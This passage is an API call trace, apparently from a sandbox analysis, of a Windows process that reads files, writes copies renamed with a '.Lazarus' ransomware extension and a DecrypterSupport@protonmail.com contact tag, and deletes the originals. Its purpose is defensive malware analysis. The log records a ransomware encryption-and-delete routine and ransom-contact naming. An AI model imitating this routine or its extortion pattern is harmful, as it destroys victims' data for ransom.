SetLastError (dwErrCode=0x0) [0069.971] ReadFile (in: hFile=0x428, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0069.971] GetLastError () returned 0x0 [0069.971] SetLastError (dwErrCode=0x0) [0069.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3) returned 0x7cf20 [0069.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6c0 [0069.971] GetLastError () returned 0x0 [0069.971] SetLastError (dwErrCode=0x0) [0069.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0069.971] WriteFile (in: hFile=0x418, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0xe70, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327ef70*=0xe70, lpOverlapped=0x0) returned 1 [0069.972] GetLastError () returned 0x0 [0069.972] SetLastError (dwErrCode=0x0) [0069.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0069.972] GetLastError () returned 0x0 [0069.972] SetLastError (dwErrCode=0x0) [0069.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0069.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6c0 | out: hHeap=0x20000) returned 1 [0069.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0069.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0069.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0069.973] CloseHandle (hObject=0x418) returned 1 [0069.974] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x861d0 | out: hHeap=0x20000) returned 1 [0069.974] CloseHandle (hObject=0x428) returned 1 [0069.974] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0069.974] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0069.974] AreFileApisANSI () returned 1 [0069.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0069.974] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0069.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 36 [0069.974] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0069.975] GetFileType (hFile=0x428) returned 0x1 [0069.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0069.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x861d0 [0069.975] GetLastError () returned 0xb7 [0069.975] SetLastError (dwErrCode=0xb7) [0069.975] WriteFile (in: hFile=0x428, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0069.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x861d0 | out: hHeap=0x20000) returned 1 [0069.976] CloseHandle (hObject=0x428) returned 1 [0069.976] AreFileApisANSI () returned 1 [0069.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0069.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x690d0 [0069.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x690d0, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 36 [0069.977] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf")) returned 1 [0069.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0069.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0069.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0069.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0069.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0069.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0069.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0069.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0069.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d768 | out: hHeap=0x20000) returned 1 [0069.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6a8 | out: hHeap=0x20000) returned 1 [0069.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0069.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b798 | out: hHeap=0x20000) returned 1 [0069.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0069.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0069.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0069.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0069.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0069.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0069.978] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.978] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.978] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13b62, dwReserved0=0x1, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0069.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0069.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0069.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0069.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0069.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0069.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0069.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0069.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0069.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0069.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0069.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0069.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0069.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0069.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0069.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0069.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0069.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0069.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0069.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0069.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0069.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0069.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0069.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0069.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0069.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0069.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0069.979] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.979] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.979] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.979] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0069.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0069.979] AreFileApisANSI () returned 1 [0069.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0069.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0069.979] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.979] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0069.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0069.979] AreFileApisANSI () returned 1 [0069.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0069.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x717c0 [0069.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 45 [0069.980] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0069.980] GetFileType (hFile=0x428) returned 0x1 [0069.980] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0069.980] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0069.980] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0069.980] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0069.980] CloseHandle (hObject=0x428) returned 1 [0069.980] AreFileApisANSI () returned 1 [0069.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0069.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71b68 [0069.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x71b68, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 45 [0069.981] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0069.981] GetFileType (hFile=0x428) returned 0x1 [0069.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0069.981] CloseHandle (hObject=0x428) returned 1 [0069.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0069.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0069.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0069.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0069.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0069.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0069.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0069.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0069.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0069.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0069.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0069.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0069.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0069.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0069.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0069.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0069.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0069.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0069.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0069.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0069.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0069.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0069.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0069.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0069.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0069.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0069.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0069.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0069.982] AreFileApisANSI () returned 1 [0069.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0069.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x715b8 [0069.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 45 [0069.982] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13b62)) returned 1 [0069.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0069.982] AreFileApisANSI () returned 1 [0069.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0069.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0069.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0069.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0069.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0069.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0069.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0069.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0069.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0069.982] GetLastError () returned 0x0 [0069.982] SetLastError (dwErrCode=0x0) [0069.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e068 [0069.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x84fb8 [0069.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c170 [0069.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0069.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0069.982] GetLastError () returned 0x0 [0069.983] SetLastError (dwErrCode=0x0) [0069.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0069.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0069.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71960 [0069.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0069.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0069.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0069.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0069.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0069.983] AreFileApisANSI () returned 1 [0069.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0069.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x51398 [0069.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=107 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 107 [0069.983] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0069.983] GetFileType (hFile=0x428) returned 0x1 [0069.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0069.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0069.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0069.984] AreFileApisANSI () returned 1 [0069.984] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0069.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71ca0 [0069.984] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 45 [0069.984] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0069.984] GetFileType (hFile=0x418) returned 0x1 [0069.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0069.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a4b0 [0069.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0069.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.984] GetLastError () returned 0x0 [0069.984] SetLastError (dwErrCode=0x0) [0069.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0069.985] GetLastError () returned 0x0 [0069.985] SetLastError (dwErrCode=0x0) [0069.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0069.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0069.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x861d0 [0069.985] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0069.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0069.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6a8 [0069.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0069.987] GetLastError () returned 0x0 [0069.987] SetLastError (dwErrCode=0x0) [0069.987] GetLastError () returned 0x0 [0069.987] SetLastError (dwErrCode=0x0) [0069.987] GetLastError () returned 0x0 [0069.987] SetLastError (dwErrCode=0x0) [0069.987] GetLastError () returned 0x0 [0069.987] SetLastError (dwErrCode=0x0) [0069.987] ReadFile (in: hFile=0x418, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.989] WriteFile (in: hFile=0x428, 